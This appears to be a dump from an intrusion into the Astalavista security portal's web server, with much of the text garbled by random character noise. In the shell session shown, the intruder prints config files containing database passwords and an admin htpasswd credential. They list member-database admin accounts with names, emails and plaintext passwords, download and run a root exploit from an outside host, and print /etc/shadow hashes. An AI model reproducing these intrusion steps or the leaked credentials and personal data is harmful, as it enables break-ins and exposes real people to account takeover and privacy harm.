drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..& C: r8 j- y {$ q+ d+ k
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0072 o$ Z7 J4 m! i( h
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
$ V: |1 f: f, \0 {4 c I7 T+ Fdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com8 Y# a. {7 ^2 P6 N/ E# X# w$ ~6 m
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend! E' G' W. `1 q* m
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner8 ^% [2 |; L F. _! E2 k1 t* s. o
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
% ]1 N6 q ~! jdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config- W& ?' @. l, z! m8 ~( ]( o. G
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
_+ }4 f& P& H4 ]: | |/ N7 Jdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
- D0 ]3 G0 W! S3 k& b1 V-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php3 y" U4 `% N% T/ o7 c
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico/ s; ^8 E, G% o' `+ d
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed3 W( l. c& Z4 W, x0 P
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
' y; ~/ | |; x, C3 Y( N q- g- \-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
3 D. _# [( q+ D+ @; T: Q-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess' ]. v `% t8 ?, K/ Z
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
! [7 \) J5 W6 ~-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
8 G) `8 y) w6 l O1 X6 a0 V7 F; ^% s5 R-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
& A6 u* ~7 Y$ L5 _-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
( K" F C( w+ ?3 H1 b j3 r-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf* ~" \0 L G5 u/ X/ C& U
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc( E$ A1 b) ]% M
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang; p( U) u* _6 f6 S0 Y
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
, @3 \, [3 J2 ?. }( j. N5 gdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
6 @/ K( X% y" e) `drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
" w- i3 r- S$ l1 {drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata S* |1 u! h; N$ y6 ?" |
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new4 \* E$ K4 a( d
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf! s4 _ W- E" a6 Q6 ^
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re+ X/ [* S8 c: Z F, S3 W
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
' D+ [* L- f/ Y7 ~& ?( Kdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
6 {# r' X! Y2 Z' ~' {6 m" B* A/ ddrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
" L' S( v# G3 F( [$ N$ jdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
, i7 B' Q/ H! c! L4 M, O) R) {drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
$ D' w( }! U& K6 ^4 vdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
' j& O0 u1 S8 ~0 S( U" U/ o; E' t6 Kdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
6 E2 H6 h" i$ q% \, m0 edrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2' d) x5 a8 |* Q
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old" h$ B5 V; y5 X( d' C
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php" e3 ?& d, x' p" j6 P8 S& v$ L+ }
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki, N4 E% b9 p5 V$ z% N
- q3 \& w2 l8 I5 [8 s, y3 ish-3.2$ head -20 index.php# E1 E" M/ f5 [) t' F0 E6 ]( Z/ v6 S
<?PHP
% h3 g! t, }" d I/**
& ^. C6 i7 T, V5 P/ w% ]( u* Mainfile (external) for astalavistaNET v2.0# ~/ ^7 N& P: e" H# \8 s9 ?/ a+ q
*5 I1 R; b5 X$ z1 D. \
* @copyright Astalavista IT Engineering GmbH4 s: c( A( y0 x/ H
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
4 N, w2 k, A9 c0 X- T _* @version 1.00 |, Z# w" W6 q9 e( E
*/
3 D. q \' H; O# z: g/ N+ V
5 k+ q7 t3 D2 C. ^: A% k; E if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {+ `' a$ Z1 p s+ C7 w9 B
$dontStartSession = false;, R# Z/ C# g8 c( ?5 E9 j
} else {% x& k3 g7 A0 ~7 l0 X9 R! h
$dontStartSession = true;' ^0 L/ W: q9 `! e( T' |
}0 r, q4 K P! l3 h# K2 W
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);7 I0 F0 a+ y$ p+ b' `+ m
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);( d- C/ D, X& y) W9 R2 a
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);: z# w5 w1 k; g( A" D" v; B! v7 S
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
& [: H4 E# N `9 k/ @/ r- `5 x1 `8 h- m F* {
sh-3.2$ cd config
! t; h# h4 W* l- @9 E D0 psh-3.2$ ls -la
9 J; w2 B4 f2 ?; l( R; H% g8 k* {total 32
. K8 s# T) w8 K3 H" s; wdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .& F f* h$ L% J( H
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... t0 X0 o, L$ H
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
2 d( I u. r( \7 Y5 X-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
: ^$ y! b9 W% t& Y% H" p-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
& ?8 Z( A; J5 o) ]" w-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php+ n8 S6 J Y7 v, p
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
! z% h5 `- g9 o' ^* L. A& J/ f+ z) W$ t) i! p
sh-3.2$ cat com.conf.php/ m$ W' t9 [0 Q2 `! G+ U; V1 i
[snip]
4 Y- j: E8 o/ ]7 `5 I//member-database
, {0 {5 J7 {7 q& H% }3 m+ _5 C$_CONFIG['db_mem_server'] = ‘localhost’;
/ W$ f- @$ [, ^+ B& u; d3 ]5 r$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
7 k2 a9 s% J# z& i) k$_CONFIG['db_mem_user'] = ‘astanet_db’;- p; X4 g+ m5 r% @
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;5 j: g0 g$ ]& I" x! l
$_CONFIG['db_mem_debug'] = false; //true or false
# O. t" ~# }# J0 x//ads-database0 {5 Y, X8 m! U; a7 s# {
$_CONFIG['db_ads_server'] = ‘localhost’;3 \6 o, u' J$ p- k
$_CONFIG['db_ads_database'] = ‘astanet_ads’;2 f5 Y- q. r9 {3 q. r& N4 z8 q- U
$_CONFIG['db_ads_user'] = ‘astanet_db’;" x9 l0 X8 n6 |( t2 M
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
0 A: k2 J6 m L8 z$_CONFIG['db_ads_debug'] = false; //true or false/ S7 s7 U- G, j: _, ~5 w+ |
//rainbow-database
5 ~. L; ^8 T! q ?$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;* j8 h. ?# w# u0 I1 B/ @
$_CONFIG['db_rainbow_database'] = ‘rainbow’;- N" r+ a- c/ W, n5 U X, R
$_CONFIG['db_rainbow_user'] = ‘dinu’;
" R" |# z+ C5 \* T' Q$_CONFIG['db_rainbow_password'] = ‘dinudinu’;8 \4 ^& Q4 a& J' z U
$_CONFIG['db_rainbow_debug'] = false; //true or false
* x. \: B/ N9 i c% e//mailing lists database
6 o# l1 M4 ]9 e6 X. q, I3 r2 i+ g$_CONFIG['db_mailing_lists_server'] = ‘localhost’;3 _. @* L! {5 _8 U7 @- k4 m0 ~1 _: h
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
P! K1 N* T5 R0 H; q$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
0 u! h% A5 T# y$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
. ]- r* w2 y! d2 h' R$_CONFIG['db_mailing_lists_debug'] = false; //true or false7 s6 }2 A( n# P1 F% i
//paypal- c7 Z% a- X6 w
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;' l+ r: d4 B" {! ^! d, _6 @
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
6 D4 |/ S1 G. \$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
5 v# V- P9 ^; q# l$_CONFIG['sub_pp_noship'] = ‘1′;; Y1 d b# z4 t9 _4 a/ z
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
1 O+ L. _, p* \+ k% l, K, n$ P[snip]+ T6 }" ^7 T$ }
2 k0 K9 b9 h5 B4 u6 ^- i4 g
sh-3.2$ cd ..: ^6 i- ^% M+ |# Q' M# t, k2 J8 S
sh-3.2$ cd member
' i- N' S" L( C4 X, h4 ksh-3.2$ ls -la: a; E- }" l1 p* R( N( i0 S/ ~
total 20
8 @$ `$ f; P# C8 Y6 \drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
% P5 C! f' v6 X3 H8 }* Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..( I; n- Y' A7 o. g$ g( U9 [1 T' _ E
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
. f7 l- K. x! H-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php+ {( A# X3 i) @& o& v+ _3 d
sh-3.2$ cat .htaccess
r1 H1 s- [ u$ v& vSecFilterEngine off
) m" ]4 N# m, z5 X1 m, |+ ^$ F( B- v, w0 F1 ^1 u
sh-3.2$ cd ..; k6 h9 S2 X3 f0 z/ W
sh-3.2$ cd cron
# P# J) L" L K8 C qsh-3.2$ ls -la
+ i/ ~7 v5 x% T% dtotal 168
9 h& @" Z5 l8 C b8 ~drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
1 k0 m! F! }. G- r! ^! t3 Pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
O) M' L" L1 a5 }6 H1 u-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php3 V+ D2 }# {) f; z1 ]8 n
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php( j7 r" [: s- H/ r f6 }+ e
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
! b# e# l9 J7 g-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php5 F( R5 G {! k- N. C
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php( k- n& e) \5 m; Y ^
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php% ?* j' Z, B3 B! [/ p
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php* R7 |6 K9 h. t- `0 h
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php8 x% F# p) r0 a3 V. C* [
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
P9 _& B4 ^; T+ H* y-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php5 v1 `/ p' S4 f. r. `
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php' Z# i- t: K( E3 |, X7 X
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
B: ?' u$ p/ U-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
$ N J& A$ b l! Q& Z, O& L& U-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php. ?3 ^" M4 Z8 v9 Q# u8 f5 @2 W
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
8 _/ I1 Z4 @: @: D9 {5 ~-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php# e" L5 Y! c& B4 G5 H
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
4 g! W+ v3 \6 D5 Z9 B-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php. f* M9 Q2 y, ~
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email9 i' x" l$ `9 ]( R
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php3 H* x9 Z6 K7 ]1 e8 y: C9 S
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php; x: q0 |+ t; x+ R$ l- i
- d0 v* @5 N* w& z1 [sh-3.2$ cd ..- W0 p/ t/ M7 T4 G- r/ \4 w
sh-3.2$ cd _007
6 k0 Q. O. t8 A5 Msh-3.2$ ls -la N( \3 c0 h* N* F' M! H3 a
total 24 g: ]; [2 L/ k" N& |
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
W5 t' P% t. F7 H& z: Ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, P- f; ~9 ?" {+ l-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess( i7 x( L/ F8 t( z; \0 e
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php% w* t# A x2 l, x9 G1 N6 j1 ]
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php% n! A8 r- q1 A. T; p8 ~
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap3 ?: V( e& t$ f/ O1 C* n H
) z3 M4 I9 s9 n% K- V6 u
sh-3.2$ cat .htaccess
. J; j7 o% r+ V+ vauthType Basic
8 c2 c+ v) t; Z" EauthName Admin
8 ^9 B9 v0 M F3 ]6 lauthUserFile /home/astanet/auth/.htadm_pwd
$ s+ d! M6 I+ Xrequire valid-user, J0 ]! n0 S1 k4 _4 f6 A" s
3 {7 t" F/ | F) f: D7 I( M8 Ksh-3.2$ cat /home/astanet/auth/.htadm_pwd
+ t1 {. x0 m ?1 i" _* f& z! r, Radmin2net:CR0bl65MwhfT0 b2 p& |9 L F; C& Q( Z
' s1 _. X2 l& P6 ^: fsh-3.2$ mysql -u astanet_db -p; Z% A7 p0 L3 Q! V; T# M
Enter password: U9 ~" C3 H5 D- m3 \" N
Welcome to the MySQL monitor. Commands end with ; or \g.
" V. Q. s. }2 mYour MySQL connection id is 275153
2 Z0 }: d! ?( _% IServer version: 5.0.45-community-log MySQL Community Edition (GPL)( C# F( y ]& Y6 `% v& J- x/ e
- N' `! p4 Z! G5 E
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( _! n. d' W+ H2 Q3 Q+ J- \
0 ~. [" k i' _) |mysql> show databases;
6 h3 {, x- {3 ~, W9 _/ L' A+———————–+
) ?. F. x. k9 ?5 \| Database |
1 z; x: K% f* s% I+———————–+
- j0 v- ?7 x: F4 D| information_schema |7 H5 U r$ S1 v- f! F$ `
| astanet_ads |
! ~: R5 }) L9 J8 x( m0 C8 g* K5 p. b| astanet_mailing_lists |* W' o3 {1 h s i0 N. y* c
| astanet_mediawiki |3 U# S1 L3 K0 W: h& A/ [% T
| astanet_membersystem |
! |% @2 d7 `9 h1 K4 [( M| test |
% E* T) b0 U2 o% `. |+———————–+
; u2 s3 j7 E$ B6 rows in set (0.00 sec)
5 v7 v4 t L5 q! ?* B" c; o
; ~) f& u) e& U" j: P nmysql> use astanet_membersystem% a9 M; V( R# S c9 I
Database changed
p, L3 X$ F/ J$ Vmysql> show tables;9 W& z3 N' p0 l2 q( ~
+———————————–+* |% l" i% @' B
| Tables_in_astanet_membersystem |% g' q* s; _# ]5 o4 |) P
+———————————–+
4 M5 |% a$ o) A( k" ] C| blacklist_categories |
" F' l5 Q2 B; ^| blacklist_content |) O! l/ R$ t+ T% z
| blacklist_levels |$ P$ @; ~+ G' U5 M" k! M* i8 Z
| blacklist_mcset |+ H/ l" N+ c' T7 P; m- ?
| dir_categories |
, I; K. U7 I5 C/ L| dir_comments |# r6 l: k- j$ m( Y2 M: R$ q3 ^& f
| dir_links |
6 i% {$ `8 q- [: `| dir_temp |
# A% J9 w2 Z( Y( z9 q! C| dir_votes |, l. d; C6 I; i+ s
| documents |. e% k6 w$ q8 y) N( B
| documents_categories |
: H3 f1 v2 Z' q+ U9 Z. k' @. n: C1 H' v| email_content |+ b0 f1 D, } W4 W9 ?" {+ i
| email_settings |5 U+ L+ m6 C( d. V& i7 Z J5 ^: Y
| exploits |- a* v4 ~. f% Q6 `: X, L8 r
| exploits_categories |; v7 I+ k8 e T! B# u0 {# D5 @1 m; l
| exploittree_categories |
! [! {- b' s& L| exploittree_exploits |+ M: p; F) e/ k
| home_values |
- F( M- g+ c! G- R0 Q. j| iso_countries |
! \0 L& z4 E% f1 @" z2 u l| links_categories |, Q4 o; E% @, a
| links_records |
8 B+ W0 x' X" a; b3 ^" E: m| links_unauth |3 B) L8 J1 _& m1 }+ F/ H8 |
| links_votes |+ a% D, U: t& d
| log | x3 v/ X/ |4 T, Q5 W: G7 I
| news_categories |3 o' G8 w2 b: `9 ~
| news_comments |
: E) c4 B. H* b/ Z, F1 f! C| news_emoticons |
4 H5 P2 |: x; H# `0 m- q2 S| news_latest |% ^1 E6 E9 v* g6 `" L$ c) U
| news_messages |; ?! O" {& b7 z
| news_statistics |6 M0 L- n% D Q- c: x
| news_votes |2 J; k; C2 ]6 G
| prices_content |" @( U, A. E6 y+ n9 b' B2 y) h+ |
| prices_offers |
4 `$ G/ G( p! W3 r| rss_settings |3 K* O3 ^# j! `
| sessions |3 u1 T; `( v& o% r- \5 O
| stats_signups |
% ]( H, T4 n% u7 W8 k| u2u2 |
6 }. Z$ D& P. j| u2u_contact |6 s% W4 v* I0 e. @- b" t4 C
| u2u_settings |
6 `6 r" t8 t, M7 M| user_keywords_selected_categories |
; u: C7 m5 v3 Q- F, N4 m, n' u| users |
" O& J- t# l" B- K7 k, m% B| users_ipn_test |* A% I; E" a" `9 D
| users_keyword_values |& @1 V B' E+ O: ?' t
| users_profile |8 V$ C! |+ x" w! _
| users_temp |. l) z5 @& c9 j9 j
| users_upgrade |+ E8 b1 h3 [/ Q+ k" \
+———————————–+
5 @, q+ T9 [0 Z$ B46 rows in set (0.00 sec)
- @0 a2 B( J7 m1 S! X: k E
9 a) y5 P0 H) Y2 E0 s; J( W' smysql> describe users;2 s; C: d' j* {% N. D8 F% {, c
+————————–+————————————–+——+—–+———————+—————-+( k. V1 D$ o3 ~ z# U3 j" {
| Field | Type | Null | Key | Default | Extra |
0 Z% R6 ?5 x, o+————————–+————————————–+——+—–+———————+—————-+
K% L5 a4 h3 e1 h, o, Y| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |- l8 u$ K5 q4 w$ O) o
| user | varchar(50) | NO | | | |. e5 a( {5 K8 B1 q5 _8 T
| nickname | varchar(30) | NO | MUL | anonymous | |
1 s, e$ ]3 _# B; s' W| password | varchar(30) | NO | | | |7 k) J4 Q$ s: r' }' [* }
| userlevel | tinyint(3) | YES | MUL | NULL | |" A l5 e# P) h9 n/ g- o, X
| exp | int(8) unsigned | NO | | 0 | |) \( U0 J( a8 F# m! \" H
| email | varchar(50) | NO | | | |" `3 s) u4 I1 U6 H
| ip | varchar(15) | NO | | 0 | |" \' S! E& @4 p9 b2 N6 Y& f9 @/ o# a
| proxy | set(’0′,’1′) | NO | | 0 | |
5 x/ m2 l! n! l" B$ h8 }7 O| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |; [& l. @ Q# o
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | | I& g, A, G1 |" S
| anz_in | tinyint(1) | NO | | -1 | |
1 H. F" O0 w4 Y5 e| status | tinyint(1) unsigned | NO | | 0 | |
- i* @5 s( `1 [- p5 q, d| checked | set(’0′,’1′,’2′) | NO | | 0 | |4 E% d! V% i/ Y+ N) ~: S8 L
| freemember | set(’0′,’1′) | NO | | 0 | |
. z9 w! X! \+ i9 K0 I5 M2 }| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
9 z0 a. s: ]) x* o, x, Y4 o4 r: @2 O| lang | tinytext | NO | | | |7 M) i* R- ]: i2 T7 d8 d
| adid | smallint(6) | NO | | 0 | |
, m4 I( O5 R! s5 n- V| pp_txn_id | varchar(255) | YES | | NULL | |( T1 k% U6 q2 U* s$ z
| cnb_transaction_id | varchar(255) | YES | | NULL | |" o# s+ s$ q% w9 D6 ~' G" K U/ _
| cnb_order_id | varchar(255) | YES | | NULL | |
) a3 F! z5 w+ A+ P| cnb_user_id | int(11) | YES | | 0 | |
9 O5 h3 K/ M4 v4 B+————————–+————————————–+——+—–+———————+—————-+7 D( y2 ^! l0 X9 }. [
22 rows in set (0.01 sec)
0 z0 ^! G, Z! J$ P) p; b" o- w7 @) T* b+ {$ s8 s7 i
mysql> select count(*) as skids from users;- Z* \) r1 F; p
+——-+
' A- Y# y: N4 A. A2 _4 _' `2 B| skids |* H8 A# W# q U; P1 n" F2 e( u" t3 ]
+——-+% g Y1 V% m# f1 g& s
| 25199 |' \( c2 ?: } i( U# `+ G
+——-+
* {/ t! |+ f% b T6 t1 row in set (0.00 sec)
; ^9 @* J- ?: W) u" V- _8 i D; v* m1 h0 r* E
mysql> select user,nickname,password,email from users where userlevel = 1;; E0 {8 U6 S. |" i9 _; `; m
+————————–+———————-+——————+———————————–+
/ B: x Z1 |( Z4 t$ s2 N9 \, r% D| user | nickname | password | email |
+ o y, q: J3 r* Q# J* M4 S+ a+————————–+———————-+——————+———————————–+, C4 T: E" L* C; U& H1 K
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |: T. m: ]7 @0 H3 z% M& W2 b; [
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
4 t+ q8 @3 x. w* z" a) I| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |+ ]: R& ]0 W! K( P
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
# f' R* X4 e, P) d6 K| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
0 X |" X+ O' F4 l5 l9 r" j+ d| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
" L5 r" Z3 i: N3 l* m| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
. T' v" j6 t" F4 |0 W1 Q| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |. c8 v, S- K z. h; ?$ I/ O" K
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
0 A8 j; P. ]. m$ n* ?| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
( G! o; {" N0 ?1 Y s| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
5 K9 K5 [' Z h3 C4 ^& [1 x| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
8 L$ {. T2 p9 {8 u: F| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
5 g1 f {' b+ r0 G$ i& z8 O| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
8 V# [# r! h& i/ U| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
6 w) F+ n# J3 M. N9 E+ ~9 y4 c| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |2 P: J$ B) n4 q2 Q3 ?7 J
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
) a! n0 z) y5 m; P. G| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |. z9 z3 `% P1 D0 B. c
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |; `1 E; F0 h% j' C
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
* U9 d$ e9 r7 _, X* V% H+ a| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
+ f( ?: u, H2 Z- J! t& b+ P| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
4 g9 O( v+ M/ P| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
& ^/ M) @% G2 k; ^) d# R Z6 ?| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |/ w9 \9 b$ ]% R; \0 t* z5 Z! s
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
5 B6 B" O3 G- E7 S| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |( B% z( R; O2 F
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
, t+ ^' J" s# g3 G+————————–+———————-+——————+———————————–+
3 ^! R# b5 ]' O" d- p/ t; P0 Q27 rows in set (0.00 sec)
/ R2 X2 I h/ ]5 n6 Y) N f: D2 e, [
9 C# P0 U6 I& G6 b: F0 [1 Hmysql> exit;
5 e2 q6 h; g6 F- dBye
/ n- F3 W6 p7 b7 |* h; \! _1 Q* x1 W
[~] plaintext passwords? yes,
) @: M5 [9 Z+ V& |0 X) bThose so called “security professionals” who charge you $6.66 / month to/ [" k# D; |: u- I! ~8 S3 B
register at their hack-proof portal, save your passwords in plaintext…: P1 S+ t. K) K# N3 i
brilliant! _ T* k7 F8 P8 Q9 ?. A
* @9 V# j/ F" c o( v" t& ?
[~] This been fun but we want more.9 I; K* S/ e5 q
2 e3 H( r. J0 g
sh-3.2$ uname -a
4 R) F; Z A7 D. }; Q+ e1 eLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux* d9 X- w, Z5 m, B; k. g
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]* D. |" M, a+ {, r
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]/ c! D. d: s+ k {
Resolving anti.sec.labs… 13.33.33.37
9 O0 H. I- g" K) [- ~Connecting to anti.sec.labs|13.33.33.37|:80… connected.& O+ i1 h% c% s8 U/ f
HTTP request sent, awaiting response… 200 OK$ X9 O% U3 z$ L$ u! W- D
Length: 18200 (18K) [text/plain]4 k3 } m# u) t1 I# @
Saving to: `g0troot’; x6 }/ E: e5 y+ c6 v( Z
) P: j l1 P! D5 Y: I9 f3 O100%[=========================================================================================================================================>] 18,200 58.6K/s in
( j% P1 d# A `- |0.3s
+ H6 K! o' l# t8 f+ A7 ^2 K5 S* S
" V" [6 t" ^. ?% h. E18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
% `# e0 K+ X; H8 l. t
! I/ |! n$ r* R# X; h- `+ csh-3.2$ ./g0troot -i x86_647 F2 Y' c( K$ k: I6 L7 G& A
[+] g0troot - anti.sec.labs6 N4 }8 p" z; b* O3 n
[+] Target: 2.6.18-128.1.10.el5
: e! z3 E8 e/ f$ N0 r! G) G[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
; _6 `& D* B( B" G
3 H* A0 e5 j- i& t) ][+] r00tr00t
- s+ i2 L' I; u2 h[~] Executing shell…1 Y' G/ H2 K: p7 @3 C" q1 O6 S! j
, B2 X" X% P1 Tsh-3.2# id
5 {% X+ w) K% f, Xuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)/ m5 g! O0 g" E! F9 R/ n8 ?- m
% G9 K7 N8 m& `1 {sh-3.2# cat /etc/shadow
: U6 s6 Y! F# r! d# Broot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::5 I" V+ W D' Q
[snip]+ o' \, q$ `/ `) W$ l
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
" h& M6 F* Z6 j$ Q& h8 ]jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::' `0 J2 W9 m, Q( @6 s2 o0 H, y
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::, `1 D' |! v% s6 O V
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
" X- f+ m, ~, A0 p
